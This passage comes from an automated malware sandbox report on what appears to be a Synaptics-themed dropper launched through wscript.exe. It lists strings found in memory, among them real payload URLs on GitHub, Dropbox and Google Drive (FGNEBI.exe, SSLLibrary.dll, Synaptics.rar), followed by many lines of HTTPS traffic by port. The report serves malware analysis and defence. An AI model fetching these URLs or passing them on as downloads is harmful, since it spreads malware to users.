                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?
                              Source: Synaptics.exe, 0000000A.00000003.2047221664.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2897692152.000000001D9C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2897402580.000000001D93F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.000000000568B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000715B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000718E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.000000000568B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmI0
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmI0cf6Z
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpw._
                              Source: wscript.exe, 00000000.00000003.1767157683.000002235F8C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768209242.000002235F8CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com4
                              Source: wscript.exe, 00000000.00000003.1765701349.000002235D2B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768209242.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1767157683.000002235F928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/
                              Source: wscript.exe, 00000000.00000003.1767332969.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768209242.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1767157683.000002235F928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/.com1
                              Source: wscript.exe, 00000000.00000003.1767332969.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768209242.000002235F928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1767157683.000002235F928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/7
                              Source: wscript.exe, wscript.exe, 00000000.00000002.1767855881.000002235D1C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768173993.000002235F7C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1765415076.000002235F95C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main
                              Source: wscript.exe, 00000000.00000003.1766377849.000002235D295000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768192075.000002235F8C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exe
                              Source: wscript.exe, 00000000.00000003.1766882659.000002235F095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exe(qQ
                              Source: wscript.exe, 00000000.00000002.1768192075.000002235F8C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exe32
                              Source: wscript.exe, 00000000.00000003.1766540668.000002235D233000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1768024025.000002235D235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exeQ
                              Source: wscript.exe, 00000000.00000002.1768192075.000002235F8C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exeV
                              Source: wscript.exe, 00000000.00000002.1768192075.000002235F8C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exeyV
                              Source: update.exe, 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=T
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: update.exe, 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
